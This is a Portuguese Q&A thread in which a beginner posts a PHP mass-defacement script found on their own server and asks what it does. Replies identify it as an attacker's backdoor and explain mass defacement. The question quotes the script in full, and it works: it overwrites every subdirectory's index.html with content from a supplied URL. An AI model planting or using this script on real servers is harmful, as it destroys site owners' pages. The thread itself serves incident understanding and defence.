# O que este script esta executando?

Tags: php, html

Sou iniciante na área e encontrei este arquivo dentro de meu servidor :

```
<?php
/*
Script: Mass Deface Script
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";

if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
                        if(filetype($dir.$file)=="dir"){
                                $newfile=$dir.$file."/index.html";
                                echo $newfile."\n";
                                if (!copy($defaceurl, $newfile)) {
                                        echo "failed to copy $file...\n";
                                }
                        }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>


<td align=right>Mass Defacement:</td><br>
</div>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>
```

Podem me ajudar a entender o que este arquivo estava executando ?

Comment: possívelmente um backdoor que alguém subiu no seu site. Apague esse arquivo e verifique seu upload, pois está permitindo subir arquivos do tipo php.

Comment: Eu não diria "possívelmente", mas "muito possivelmente" kkkk

Comment: Eu diria de certeza absoluta ;)

Comment: Faz uma copia para o teu computador pessoal onde não possa ser utilizado remotamente. e apaga já do servidor. E revê o que tens no teu servidor, que de alguma forma existe uma falha de segurança.

Comment: Sim , realmente uma falha de segurança, mas o que ele esta execultando ?

Comment: @CesarLimaPaulo veja a resposta do Marcelo.

Answer (score 3):

O script retorna o diretório atual onde esse arquivo se encontra, verifica se é manipulável, e cria um novo arquivo index.html

**Mass Defacement**

> the defacers aren’t selective in their targets; in most cases they just use automated tools to find vulnerable servers, and automatically exploit them. The exploit automatically uploads a backdoor to the compromised server which will provide, for example, shell access to the compromised server. The defacer can launch further attacks via the backdoor, such as trying to escalate privileges using local kernel exploits, or reporting the compromised server to a defacement archive. These backdoors are also sold on the black market, enabling buyers to, for example, turn a compromised server into a node in a DDoS network, or use it as spam relay host.

São ataques sem alvo fixo, verificam os sites com vulnerabilidade e a exploram, podendo substituir os arquivos, copiá-los ou mesmo utilizar o servidor para mailing spam e DDoS.

Ou seja, seu site de alguma forma está vulnerável e permitiu o acesso ao servidor a terceiros.

[Mass Defacement](http://www.kaspersky.com/about/news/virus/2010/Mass_Defacement_of_Websites_Hacker_Fun_that_Threatens_Business)

Comment: Comecei a procurar depois de dois sites terem as index reescritas.
estou revendo minha segurança, penso que este arquivo foi upado por algum formularios que permitiu upload de .php.

O que acha ?

Agora fiquei preocupado , tenho 9 sites neste servidor e estou monitorando eles.
Sabe me dizer como faço para criar um algoritimo que possibilita minhas index me apresentarem como online em uma pagina onde posso ficar monitorando. Como se eu tivesse um sistema que me informasse que meus sites estão ok.

Quero colocar algo que fique se comunicando comigo. preciso monitorar

Comment: Você pode fazer isso, mas lembre-se que será um paliativo e você deve corrigir essa brecha na segurança o mais rápido possível. Você fazer um script em que abra vasculhe o diretório e encontre o index.html, abra ele e faça uma leitura do conteúdo. Dê uma lida em http://php.net/manual/pt_BR/class.directoryiterator.php http://php.net/manual/pt_BR/function.file-get-contents.php

Comment: @CesarLimaPaulo A resposta não foi útil/correta?